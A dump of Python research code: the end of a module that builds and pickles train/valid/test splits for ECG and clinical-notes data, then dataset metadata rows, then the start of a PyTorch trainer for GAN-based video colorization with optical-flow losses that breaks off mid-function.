    pickles under <root_dir>/experiments_data/<expdata_id>, and can reload a
    previously generated split.
    """

    def __init__(self, expdata_id, root_dir='.'):
        """
        Parameters
        ----------
        expdata_id : str
            name of current experiment
        root_dir : str, optional (default='.')
            directory under which 'experiments_data' lives
        """
        self.expdata_id = expdata_id
        check_expdata_dir(expdata_id=expdata_id)
        self.root_dir = root_dir
        self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
        print(
            'Current ExpData_ID: {0} --- Target for ECG'.format(
                self.expdata_id))

    def get_exp_data(self,
                     sel_task='diagnose',
                     shuffle=True,
                     split_ratio=[0.64, 0.16, 0.2],
                     data_root='',
                     n_limit=-1):
        """Generate and persist a train/valid/test split for the selected task.

        Parameters
        ----------
        sel_task : str, optional (default='diagnose')
            name of current healthcare task
        shuffle : bool, optional (default=True)
            determine whether shuffle data or not
        split_ratio : list, optional (default=[0.64,0.16,0.2])
            used for split whole data into train/valid/test
        data_root : str, optional (default='')
            if data_root=='', an Exception is raised; else use data in data_root
        n_limit : int, optional (default = -1)
            use only the first n_limit samples; if n_limit==-1, use all data
            (the original accepted this parameter but never applied it)

        Raises
        ------
        Exception
            if data_root is empty.
        """
        self.sel_task = sel_task
        if data_root == '':
            raise Exception('fill in correct data_root')
        # Load the full feature matrix and the task's label matrix.
        # 'with' guarantees the file handles are closed (original leaked them).
        with open(os.path.join(data_root, 'x_data', 'feat.pkl'), 'rb') as f:
            feat_seq = pickle.load(f)
        with open(os.path.join(data_root, 'y_data', self.sel_task + '.pkl'), 'rb') as f:
            label_seq = pickle.load(f)
        # Honor n_limit as documented.
        if n_limit > 0:
            feat_seq = feat_seq[:n_limit]
            label_seq = label_seq[:n_limit]
        label_n = np.shape(label_seq)[1]
        feat_n = np.shape(feat_seq)[1]
        # Concatenate label + features per sample so a single shuffle keeps
        # x and y aligned.
        all_list = [each_label.tolist() + feat_seq[cur_i].tolist()
                    for cur_i, each_label in enumerate(label_seq)]
        # shuffle the list
        if shuffle:
            random.shuffle(all_list)
        N = len(all_list)
        x_list = [np.array(item[label_n:]).astype(float) for item in all_list]
        y_list = [np.array(item[:label_n]).astype(float) for item in all_list]
        train_ratio = split_ratio[0]
        valid_ratio = split_ratio[1]
        n_train = int(train_ratio * N)
        n_train_valid = int((train_ratio + valid_ratio) * N)
        training_x = x_list[:n_train]
        validing_x = x_list[n_train:n_train_valid]
        testing_x = x_list[n_train_valid:]
        training_y = y_list[:n_train]
        validing_y = y_list[n_train:n_train_valid]
        testing_y = y_list[n_train_valid:]
        os.makedirs(self.expdata_dir, exist_ok=True)
        for name, obj in (('train_x.pkl', training_x),
                          ('valid_x.pkl', validing_x),
                          ('test_x.pkl', testing_x)):
            with open(os.path.join(self.expdata_dir, name), 'wb') as f:
                pickle.dump(obj, f)
        print('finished X generate')
        for name, obj in (('train_y.pkl', training_y),
                          ('valid_y.pkl', validing_y),
                          ('test_y.pkl', testing_y)):
            with open(os.path.join(self.expdata_dir, name), 'wb') as f:
                pickle.dump(obj, f)
        print('finished Y generate')
        expdata_statistic = {
            'task': self.sel_task,
            # NOTE(review): 'raio' is a typo for 'ratio'; the key is kept
            # verbatim for compatibility with previously generated pickles.
            'raio': split_ratio,
            'feat_n': feat_n,
            'label_n': label_n,
            'len_train': len(training_x),
            'len_valid': len(validing_x),
            'len_test': len(testing_x)
        }
        with open(os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb') as f:
            pickle.dump(expdata_statistic, f)
        self.train = {'x': training_x, 'y': training_y,
                      'feat_n': feat_n, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y,
                      'feat_n': feat_n, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y,
                     'feat_n': feat_n, 'label_n': label_n}
        print('generate finished')
        print('target Task:', expdata_statistic['task'])
        print('N of features:', expdata_statistic['feat_n'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def load_exp_data(self):
        """Reload a previously generated split into self.train/valid/test.

        Raises
        ------
        Exception
            if the experiment directory does not exist yet.
        """
        if os.path.exists(self.expdata_dir) is False:
            raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))

        def _load(name):
            # Helper: load one pickle from the experiment dir, closing the file.
            with open(os.path.join(self.expdata_dir, name), 'rb') as f:
                return pickle.load(f)

        training_x = _load('train_x.pkl')
        validing_x = _load('valid_x.pkl')
        testing_x = _load('test_x.pkl')
        training_y = _load('train_y.pkl')
        validing_y = _load('valid_y.pkl')
        testing_y = _load('test_y.pkl')
        expdata_statistic = _load('expdata_statistic.pkl')
        feat_n = expdata_statistic['feat_n']
        label_n = expdata_statistic['label_n']
        self.train = {'x': training_x, 'y': training_y,
                      'feat_n': feat_n, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y,
                      'feat_n': feat_n, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y,
                     'feat_n': feat_n, 'label_n': label_n}
        print('load finished')
        print('target Task:', expdata_statistic['task'])
        print('N of features:', expdata_statistic['feat_n'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def show_data(self, k=3):
        """Print the first k samples of each split.

        Parameters
        ----------
        k : int, optional (default=3)
            fetch k sample data for show
        """
        for header, part in (('------------Train--------------', self.train),
                             ('------------Valid--------------', self.valid),
                             ('------------Test--------------', self.test)):
            print(header)
            print('x_data', part['x'][:k])
            print('y_data', part['y'][:k])
class textdata:
    """Experiment-data generation/loading helper for clinical-notes datasets.

    Each sample's x is the path of a note file under <data_root>/x_data and
    its y is the corresponding label row of <data_root>/y_data/<task>.csv.
    Splits are persisted as pickles under
    <root_dir>/experiments_data/<expdata_id>.
    """

    def __init__(self, expdata_id, root_dir='.'):
        """
        Parameters
        ----------
        expdata_id : str
            name of current experiment
        root_dir : str, optional (default='.')
            directory under which 'experiments_data' lives
        """
        self.expdata_id = expdata_id
        check_expdata_dir(expdata_id=expdata_id)
        self.root_dir = root_dir
        self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
        print(
            'Current ExpData_ID: {0} --- Target for Clinical Notes'.format(
                self.expdata_id))

    def get_exp_data(self,
                     sel_task='diagnose',
                     shuffle=True,
                     split_ratio=[0.64, 0.16, 0.2],
                     data_root='',
                     n_limit=-1):
        """Generate and persist a train/valid/test split for the selected task.

        Parameters
        ----------
        sel_task : str, optional (default='diagnose')
            name of current healthcare task
        shuffle : bool, optional (default=True)
            determine whether shuffle data or not
        split_ratio : list, optional (default=[0.64,0.16,0.2])
            used for split whole data into train/valid/test
        data_root : str, (default='')
            use data in data_root; an Exception is raised when empty
        n_limit : int, optional (default = -1)
            use only the first n_limit label rows; if n_limit==-1, use all data

        Raises
        ------
        Exception
            if data_root is empty.
        """
        self.sel_task = sel_task
        if data_root == '':
            raise Exception('fill in correct data_root')
        all_list = []
        label_n = 0
        episode_dir = os.path.join(data_root, 'x_data')
        label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
                                             self.sel_task + '.csv')).values
        for row_id in trange(len(label_seq)):
            # '>=' (not '>') so exactly n_limit rows are considered; the
            # original '>' let one extra row through. A per-row
            # time.sleep(0.01) throttle was removed: it only slowed generation.
            if n_limit > 0 and row_id >= n_limit:
                break
            row = label_seq[row_id, :]
            concrete_path = os.path.join(episode_dir, row[0])
            # Skip rows whose note file is missing on disk.
            if os.path.exists(concrete_path) is False:
                continue
            all_list.append([concrete_path] + row[1:].astype(float).tolist())
            label_n = len(row[1:])
        # shuffle the list
        if shuffle:
            random.shuffle(all_list)
        N = len(all_list)
        x_list = [item[0] for item in all_list]
        y_list = [np.array(item[1:]).astype(float) for item in all_list]
        train_ratio = split_ratio[0]
        valid_ratio = split_ratio[1]
        n_train = int(train_ratio * N)
        n_train_valid = int((train_ratio + valid_ratio) * N)
        training_x = x_list[:n_train]
        validing_x = x_list[n_train:n_train_valid]
        testing_x = x_list[n_train_valid:]
        training_y = y_list[:n_train]
        validing_y = y_list[n_train:n_train_valid]
        testing_y = y_list[n_train_valid:]
        os.makedirs(self.expdata_dir, exist_ok=True)
        # 'with' guarantees the handles are closed (original leaked them).
        for name, obj in (('train_x.pkl', training_x),
                          ('valid_x.pkl', validing_x),
                          ('test_x.pkl', testing_x)):
            with open(os.path.join(self.expdata_dir, name), 'wb') as f:
                pickle.dump(obj, f)
        print('finished X generate')
        for name, obj in (('train_y.pkl', training_y),
                          ('valid_y.pkl', validing_y),
                          ('test_y.pkl', testing_y)):
            with open(os.path.join(self.expdata_dir, name), 'wb') as f:
                pickle.dump(obj, f)
        print('finished Y generate')
        expdata_statistic = {
            'task': self.sel_task,
            # NOTE(review): 'raio' is a typo for 'ratio'; kept verbatim for
            # compatibility with previously generated pickles.
            'raio': split_ratio,
            'label_n': label_n,
            'len_train': len(training_x),
            'len_valid': len(validing_x),
            'len_test': len(testing_x)
        }
        with open(os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb') as f:
            pickle.dump(expdata_statistic, f)
        self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
        print('generate finished')
        print('target Task:', expdata_statistic['task'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def load_exp_data(self):
        """Reload a previously generated split into self.train/valid/test.

        Raises
        ------
        Exception
            if the experiment directory does not exist yet.
        """
        if os.path.exists(self.expdata_dir) is False:
            raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))

        def _load(name):
            # Helper: load one pickle from the experiment dir, closing the file.
            with open(os.path.join(self.expdata_dir, name), 'rb') as f:
                return pickle.load(f)

        training_x = _load('train_x.pkl')
        validing_x = _load('valid_x.pkl')
        testing_x = _load('test_x.pkl')
        training_y = _load('train_y.pkl')
        validing_y = _load('valid_y.pkl')
        testing_y = _load('test_y.pkl')
        expdata_statistic = _load('expdata_statistic.pkl')
        label_n = expdata_statistic['label_n']
        self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
        print('load finished')
        print('target Task:', expdata_statistic['task'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def show_data(self, k=3):
        """Print the first k samples of each split.

        Parameters
        ----------
        k : int, optional (default=3)
            fetch k sample data for show
        """
        for header, part in (('------------Train--------------', self.train),
                             ('------------Valid--------------', self.valid),
                             ('------------Test--------------', self.test)):
            print(header)
            print('x_data', part['x'][:k])
            print('y_data', part['y'][:k])
if __name__ == '__main__':
    # Smoke test: generate and reload a text-data split.
    print('hello world')
    demo = textdata('test.1.text')
    demo.get_exp_data(sel_task='diagnose', data_root='./datasets/text')
    demo.load_exp_data()
| 37.210399
| 102
| 0.547525
| 3,989
| 30,773
| 3.987215
| 0.042617
| 0.067777
| 0.072179
| 0.058095
| 0.954165
| 0.951713
| 0.945552
| 0.944169
| 0.942911
| 0.936184
| 0
| 0.006781
| 0.300296
| 30,773
| 827
| 103
| 37.210399
| 0.731887
| 0.102135
| 0
| 0.884477
| 0
| 0
| 0.142078
| 0.020163
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028881
| false
| 0
| 0.019856
| 0
| 0.055957
| 0.189531
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7e189e6773746fd1d80a363f8e5b716329bbc27
| 31,010
|
py
|
Python
|
trainer.py
|
Sheroa/Video_Colorization
|
5c772ac0ec944814cd8be0a94b0746116b11ac01
|
[
"MIT"
] | null | null | null |
trainer.py
|
Sheroa/Video_Colorization
|
5c772ac0ec944814cd8be0a94b0746116b11ac01
|
[
"MIT"
] | null | null | null |
trainer.py
|
Sheroa/Video_Colorization
|
5c772ac0ec944814cd8be0a94b0746116b11ac01
|
[
"MIT"
] | null | null | null |
import time
import datetime
import itertools
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.autograd as autograd
from torch.utils.data import DataLoader
import torch.backends.cudnn as cudnn
import dataset
import utils
import sys
import networks.pwcnet as pwcnet
def Train_single(opt):
    """Adversarially train the single-frame colorization generator.

    Optimizes the generator with L1 + LSGAN loss and a patch discriminator
    with MSE (LSGAN) loss on single frames. Requires CUDA.

    Parameters
    ----------
    opt : options object (argparse.Namespace-like) carrying every
        hyper-parameter referenced below (lr_g, lr_d, b1, b2, weight_decay,
        epochs, batch_size, lambda_gan, save/lr-decay settings, ...).
    """
    # ----------------------------------------
    # Network training parameters
    # ----------------------------------------
    # cudnn benchmark
    cudnn.benchmark = opt.cudnn_benchmark
    # Loss functions
    criterion_L1 = torch.nn.L1Loss().cuda()
    criterion_MSE = torch.nn.MSELoss().cuda()
    # Initialize Generator
    generatorNet = utils.create_generator(opt)
    discriminator = utils.create_discriminator(opt)
    # To device
    if opt.multi_gpu:
        generatorNet = nn.DataParallel(generatorNet)
        generatorNet = generatorNet.cuda()
        discriminator = nn.DataParallel(discriminator)
        discriminator = discriminator.cuda()
    else:
        discriminator = discriminator.cuda()
        generatorNet = generatorNet.cuda()
    # Optimizers
    optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
    optimizer_D = torch.optim.Adam(discriminator.parameters(), lr = opt.lr_d, betas = (opt.b1, opt.b2))
    # Learning rate decrease
    def adjust_learning_rate(opt, epoch, iteration, optimizer):
        # Set the learning rate to the initial LR decayed by "lr_decrease_factor"
        # every "lr_decrease_epoch" epochs (or every "lr_decrease_iter" iterations)
        if opt.lr_decrease_mode == 'epoch':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
        if opt.lr_decrease_mode == 'iter':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
    # Save the model if pre_train == True
    def save_model(opt, epoch, iteration, len_dataset, generator):
        """Save the model at "checkpoint_interval" and its multiple"""
        if opt.multi_gpu == True:
            if opt.save_mode == 'epoch':
                if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                    if opt.save_name_mode:
                        torch.save(generator.module, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
                        print('The trained model is successfully saved at epoch %d' % (epoch))
            if opt.save_mode == 'iter':
                if iteration % opt.save_by_iter == 0:
                    if opt.save_name_mode:
                        torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                        print('The trained model is successfully saved at iteration %d' % (iteration))
        else:
            if opt.save_mode == 'epoch':
                if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                    if opt.save_name_mode:
                        torch.save(generator, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
                        print('The trained model is successfully saved at epoch %d' % (epoch))
            if opt.save_mode == 'iter':
                if iteration % opt.save_by_iter == 0:
                    if opt.save_name_mode:
                        torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                        print('The trained model is successfully saved at iteration %d' % (iteration))
    # ----------------------------------------
    # Network dataset
    # ----------------------------------------
    # Define the class list
    imglist = utils.text_readlines('ILSVRC2012_train_sal_name.txt')[:1272480]
    # Define the dataset
    trainset = dataset.ColorizationDataset(opt, imglist)
    print('The overall number of classes:', len(trainset))
    # Define the dataloader
    dataloader = DataLoader(trainset, batch_size = opt.batch_size, shuffle = True, num_workers = opt.num_workers, pin_memory = True)
    # ----------------------------------------
    # Training
    # ----------------------------------------
    # Tensor type
    Tensor = torch.cuda.FloatTensor
    # Count start time
    prev_time = time.time()
    # For loop training
    for epoch in range(opt.epochs):
        for iteration, (x_t, y_t) in enumerate(dataloader):
            # Reset gradients of both networks for this iteration
            optimizer_G.zero_grad()
            optimizer_D.zero_grad()
            lstm_state = None
            x_t = x_t.cuda()
            y_t = y_t.cuda()
            # Adversarial ground truths sized to the actual batch
            # (assumes the discriminator emits 1x30x30 score maps -- TODO confirm)
            valid = Tensor(np.ones((x_t.shape[0], 1, 30, 30)))
            fake = Tensor(np.zeros((x_t.shape[0], 1, 30, 30)))
            # Use the actual batch size x_t.shape[0]: the final batch of an
            # epoch can be smaller than opt.batch_size, and the original
            # opt.batch_size here mismatched x_t on that partial batch.
            p_t_last = torch.zeros(x_t.shape[0], opt.out_channels, opt.resize_h, opt.resize_w).cuda()
            # Generator output
            p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
            # Fake samples (detached so the D loss does not reach the generator)
            fake_scalar = discriminator(x_t, p_t.detach())
            loss_fake = criterion_MSE(fake_scalar, fake)
            # True samples
            true_scalar = discriminator(x_t, y_t)
            loss_true = criterion_MSE(true_scalar, valid)
            # Overall discriminator loss
            loss_D = 0.5 * (loss_fake + loss_true)
            # Train Generator
            # GAN Loss
            fake_scalar = discriminator(x_t, p_t)
            loss_G = criterion_MSE(fake_scalar, valid)
            # Pixel-level loss
            loss_L1 = criterion_L1(p_t, y_t)
            # Overall Loss and optimize
            loss = loss_L1 + opt.lambda_gan * loss_G
            # NOTE(review): both zero_grad calls happen before both backward
            # passes, so loss.backward() also deposits gradients in the
            # discriminator (via the non-detached call above) that
            # optimizer_D.step() then applies -- confirm this is intended.
            loss.backward()
            loss_D.backward()
            optimizer_G.step()
            optimizer_D.step()
            # Determine approximate time left
            iters_done = epoch * len(dataloader) + iteration
            iters_left = opt.epochs * len(dataloader) - iters_done
            time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
            prev_time = time.time()
            # Print log
            print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] [G Loss: %.4f] [D Loss: %.4f] Time_left: %s" %
                ((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), loss_G.item(), loss_D.item(), time_left))
            # Save model at certain epochs or iterations
            save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
            # Learning rate decrease at certain epochs
            adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
            adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_D)
def Pre_train_single(opt):
    """Pre-train the single-frame colorization generator with L1 loss only.

    Same data pipeline as Train_single but without a discriminator or GAN
    loss. Requires CUDA.

    Parameters
    ----------
    opt : options object (argparse.Namespace-like) carrying every
        hyper-parameter referenced below (lr_g, b1, b2, weight_decay,
        epochs, batch_size, save/lr-decay settings, ...).
    """
    # ----------------------------------------
    # Network training parameters
    # ----------------------------------------
    print("Pre_train_single")
    # cudnn benchmark
    cudnn.benchmark = opt.cudnn_benchmark
    # Loss functions (MSE criterion was created but unused in the original)
    criterion_L1 = torch.nn.L1Loss().cuda()
    # Initialize Generator
    generatorNet = utils.create_generator(opt)
    # To device
    if opt.multi_gpu:
        generatorNet = nn.DataParallel(generatorNet)
        generatorNet = generatorNet.cuda()
    else:
        generatorNet = generatorNet.cuda()
    # Optimizers
    optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
    # Learning rate decrease
    def adjust_learning_rate(opt, epoch, iteration, optimizer):
        # Set the learning rate to the initial LR decayed by "lr_decrease_factor"
        # every "lr_decrease_epoch" epochs (or every "lr_decrease_iter" iterations)
        if opt.lr_decrease_mode == 'epoch':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
        if opt.lr_decrease_mode == 'iter':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
    # Save the model if pre_train == True
    def save_model(opt, epoch, iteration, len_dataset, generator):
        """Save the model at "checkpoint_interval" and its multiple"""
        if opt.multi_gpu == True:
            if opt.save_mode == 'epoch':
                if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                    if opt.save_name_mode:
                        torch.save(generator.module, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
                        print('The trained model is successfully saved at epoch %d' % (epoch))
            if opt.save_mode == 'iter':
                if iteration % opt.save_by_iter == 0:
                    if opt.save_name_mode:
                        torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                        print('The trained model is successfully saved at iteration %d' % (iteration))
        else:
            if opt.save_mode == 'epoch':
                if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                    if opt.save_name_mode:
                        torch.save(generator, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
                        print('The trained model is successfully saved at epoch %d' % (epoch))
            if opt.save_mode == 'iter':
                if iteration % opt.save_by_iter == 0:
                    if opt.save_name_mode:
                        torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                        print('The trained model is successfully saved at iteration %d' % (iteration))
    # ----------------------------------------
    # Network dataset
    # ----------------------------------------
    # Define the class list
    imglist = utils.text_readlines('ILSVRC2012_train_sal_name.txt')[:1272480]
    # Define the dataset
    trainset = dataset.ColorizationDataset(opt, imglist)
    print('The overall number of classes:', len(trainset))
    # Define the dataloader
    dataloader = DataLoader(trainset, batch_size = opt.batch_size, shuffle = True, num_workers = opt.num_workers, pin_memory = True)
    # ----------------------------------------
    # Training
    # ----------------------------------------
    # Count start time
    prev_time = time.time()
    # For loop training
    for epoch in range(opt.epochs):
        for iteration, (x_t, y_t) in enumerate(dataloader):
            # Train Generator
            optimizer_G.zero_grad()
            lstm_state = None
            x_t = x_t.cuda()
            y_t = y_t.cuda()
            # Use the actual batch size x_t.shape[0]: the final batch of an
            # epoch can be smaller than opt.batch_size, and the original
            # opt.batch_size here mismatched x_t on that partial batch.
            # (An unused 'valid' target tensor was also removed.)
            p_t_last = torch.zeros(x_t.shape[0], opt.out_channels, opt.resize_h, opt.resize_w).cuda()
            # Generator output
            p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
            # Pixel-level loss
            loss_L1 = criterion_L1(p_t, y_t)
            # Overall Loss and optimize
            loss = loss_L1
            loss.backward()
            optimizer_G.step()
            # Determine approximate time left
            iters_done = epoch * len(dataloader) + iteration
            iters_left = opt.epochs * len(dataloader) - iters_done
            time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
            prev_time = time.time()
            # Print log
            print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] Time_left: %s" %
                ((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), time_left))
            # Save model at certain epochs or iterations
            save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
            # Learning rate decrease at certain epochs
            adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
def Train_GAN(opt):
    # Train the recurrent video-colorization generator with an adversarial
    # (LSGAN/MSE) loss plus short-term and long-term optical-flow warping
    # losses for temporal consistency. Requires CUDA and a PWC-Net flow model.
    # ----------------------------------------
    # Network training parameters
    # ----------------------------------------
    # cudnn benchmark
    cudnn.benchmark = opt.cudnn_benchmark
    # Loss functions
    criterion_L1 = torch.nn.L1Loss().cuda()
    criterion_MSE = torch.nn.MSELoss().cuda()
    # Initialize Generator
    generatorNet = utils.create_generator(opt)
    discriminator = utils.create_discriminator(opt)
    flownet = utils.create_pwcnet(opt)
    # To device
    if opt.multi_gpu:
        generatorNet = nn.DataParallel(generatorNet)
        generatorNet = generatorNet.cuda()
        discriminator = nn.DataParallel(discriminator)
        discriminator = discriminator.cuda()
        flownet = nn.DataParallel(flownet)
        flownet = flownet.cuda()
    else:
        discriminator = discriminator.cuda()
        generatorNet = generatorNet.cuda()
        flownet = flownet.cuda()
    # Optimizers (only the generator uses weight decay)
    optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
    optimizer_D = torch.optim.Adam(discriminator.parameters(), lr = opt.lr_d, betas = (opt.b1, opt.b2))
    # Learning rate decrease
    def adjust_learning_rate(opt, epoch, iteration, optimizer):
        # Set the learning rate to the initial LR decayed by "lr_decrease_factor"
        # every "lr_decrease_epoch" epochs (or every "lr_decrease_iter" iterations)
        if opt.lr_decrease_mode == 'epoch':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
        if opt.lr_decrease_mode == 'iter':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
    # Save the model if pre_train == True
    def save_model(opt, epoch, iteration, len_dataset, generator):
        """Save the model at "checkpoint_interval" and its multiple"""
        # NOTE(review): the multi-GPU epoch filename uses 'Gan%d' while the
        # single-GPU one uses 'GAN%d' -- confirm whether this is deliberate.
        if opt.multi_gpu == True:
            if opt.save_mode == 'epoch':
                if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                    if opt.save_name_mode:
                        torch.save(generator.module, 'Pre_%s_epoch%d_bs%d_Gan%d_os%d_ol%d.pth' % (opt.task, epoch, opt.batch_size, opt.lambda_gan, opt.lambda_flow, opt.lambda_flow_long))
                        print('The trained model is successfully saved at epoch %d' % (epoch))
            if opt.save_mode == 'iter':
                if iteration % opt.save_by_iter == 0:
                    if opt.save_name_mode:
                        torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                        print('The trained model is successfully saved at iteration %d' % (iteration))
        else:
            if opt.save_mode == 'epoch':
                if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                    if opt.save_name_mode:
                        torch.save(generator, 'Pre_%s_epoch%d_bs%d_GAN%d_os%d_ol%d.pth' % (opt.task, epoch, opt.batch_size, opt.lambda_gan, opt.lambda_flow, opt.lambda_flow_long))
                        print('The trained model is successfully saved at epoch %d' % (epoch))
            if opt.save_mode == 'iter':
                if iteration % opt.save_by_iter == 0:
                    if opt.save_name_mode:
                        torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                        print('The trained model is successfully saved at iteration %d' % (iteration))
    # ----------------------------------------
    # Network dataset
    # ----------------------------------------
    # Define the class list
    imglist = utils.text_readlines('videocolor_linux.txt')
    classlist = utils.get_dirs(opt.baseroot)
    '''
    imgnumber = len(imglist) - (len(imglist) % opt.batch_size)
    imglist = imglist[:imgnumber]
    '''
    # Define the dataset
    trainset = dataset.MultiFramesDataset(opt, imglist, classlist)
    print('The overall number of classes:', len(trainset))
    # Define the dataloader
    dataloader = utils.create_dataloader(trainset, opt)
    # ----------------------------------------
    # Training
    # ----------------------------------------
    # Tensor type
    Tensor = torch.cuda.FloatTensor
    # Count start time
    prev_time = time.time()
    # For loop training
    for epoch in range(opt.epochs):
        for iteration, (in_part, out_part) in enumerate(dataloader):
            # Reset gradients and recurrent state; zero the per-sequence
            # loss accumulators (summed over the frames of this clip)
            optimizer_G.zero_grad()
            optimizer_D.zero_grad()
            lstm_state = None
            # NOTE(review): if opt.iter_frames < 2 these stay plain ints and
            # the .item() calls in the log line below will fail -- confirm
            # iter_frames is always >= 2.
            loss_flow = 0
            loss_flow_long = 0
            loss_L1 = 0
            loss_D = 0
            loss_G = 0
            # First frame of the clip, used as anchor for the long-term loss
            x_0 = in_part[0].cuda()
            p_t_0 = in_part[0].cuda()
            # Adversarial ground truth
            # (assumes the discriminator emits 1x30x30 score maps -- TODO confirm)
            valid = Tensor(np.ones((in_part[0].shape[0], 1, 30, 30)))
            fake = Tensor(np.zeros((in_part[0].shape[0], 1, 30, 30)))
            for iter_frame in range(opt.iter_frames):
                # Read data
                x_t = in_part[iter_frame].cuda()
                y_t = out_part[iter_frame].cuda()
                # Initialize the second input and compute flow loss
                if iter_frame == 0:
                    # NOTE(review): sized with opt.batch_size while valid/fake
                    # above use the actual batch size in_part[0].shape[0]; a
                    # final partial batch would mismatch -- verify the custom
                    # dataloader drops incomplete batches.
                    p_t_last = torch.zeros(opt.batch_size, opt.out_channels, opt.resize_h, opt.resize_w).cuda()
                elif iter_frame == 1:
                    x_t_last = in_part[iter_frame - 1].cuda()
                    # previous prediction is fed back as a constant input
                    p_t_last = p_t.detach()
                    p_t_0 = p_t.detach()
                    p_t_last.requires_grad = False
                    p_t_0.requires_grad = False
                    # o_t_last_2_t range is [-20, +20]
                    o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
                    x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
                    # y_t_warp range is [0, 1]
